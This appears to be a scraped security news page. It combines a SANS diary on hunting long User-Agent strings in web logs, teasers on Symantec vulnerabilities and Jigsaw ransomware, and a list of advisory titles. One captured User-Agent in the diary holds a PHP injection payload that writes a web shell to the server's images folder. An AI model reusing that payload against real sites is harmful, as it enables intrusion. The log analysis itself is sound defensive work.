(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest once that I can find in my logs. First of all: how?

Fist, I am extracting the User Agent string from my web server access log:

cut -f 6 -d access_log  /tmp/useragents  (this may look different for you if you use a different log format)

Next, sorting the result by line length:

cat /tmp/useragents | awk { print length, $0 } | sort -n -s | cut -d  -f2- | uniq

So finally some of the winners rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...) s:254:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22images\x22.chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST[@123if(\x5Cx24mujj!=){\x5Cx24xsser=base64_decode(\x5Cx24_POST[z0 MSOffice 15)

Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...

Oddly enough, no shellshock today.

What is your longest User-Agent if you search your weblogs?

Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


(credit: LPS.1)

Much of the product line from security firm Symantec contains a raft of vulnerabilities that expose millions of consumers, small businesses, and large organizations to self-replicating attacks that take complete control of their computers, a researcher warned Tuesday.

"These vulnerabilities are as bad as it gets," Tavis Ormandy, a researcher with Google's Project Zero, wrote in a blog post. "They don’t require any user interaction, they affect the default configuration, and the software runs at the highest privilege levels possible. In certain cases on Windows, vulnerable code is even loaded into the kernel, resulting in remote kernel memory corruption."

The post was published shortly after Symantec issued its own advisory, which listed 17 Symantec enterprise products and eight Norton consumer and small business products being affected. Ormandy warned that the vulnerability is unusually easy to exploit, allowing the exploits to spread virally from machine to machine over a targeted network, or potentially over the Internet at large. Ormandy continued:

Read 4 remaining paragraphs | Comments


Enlarge (credit: Jakub Kroustek)

The crypto ransomware racket is a booming business that generates lots of revenue, so it only makes sense that the scourge is growing. And with new titles entering the market on almost a weekly basis, how do the criminals behind them make their malware stand out?

In the case of Jigsaw, a ransomware package that was first spotted in April by researchers with the Bleeping Computer security site, the answer is to be as brazen and mean-spirited as possible while at the same time making the payment process as easy as possible. A case in point: Jigsaw not only threatens the permanent loss of personal data, it also holds out the fear that victims' dirty laundry will be published for all to see. And it uses a taunting tone when notifying people of their options. Witness the screenshot above from a recent version. It states:

Very bad news! I am a so-called ransomware/locker with following advanced functions: Encrypting all your data.
Collecting all logins, contacts, eMail, Passwords and Skype History .....Done!
Uploading all of it on a server .....................Done!
Sending a copy of those Datas to ALL of your contacts..............Pending

The doxing threat, which was added last week, is pure evil genius because it gives victims a strong incentive to pay the ransom even when the purloined data is available on a backup drive.

Read 4 remaining paragraphs | Comments

KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
[KIS-2016-10] Concrete5 <= (Application::dispatch) Local File Inclusion Vulnerability
[KIS-2016-09] Concrete5 <= Multiple Stored Cross-Site Scripting Vulnerabilities
[KIS-2016-08] Concrete5 <= Multiple Cross-Site Request Forgeries Vulnerabilities
Ladesk Agent #1 (Bug Bounty) - Session Reset Password Vulnerability
Iranian Weblog Services v3.3 CMS - Multiple Web Vulnerabilities
Alfine CMS v2.6 - (Login) Auth Bypass Vulnerability
Mutualaid CMS v4.3.1 - SQL Injection Web Vulnerability
[SECURITY] [DSA 3607-1] linux security update
Craft CMS affected by server side template injection
Internet Storm Center Infocon Status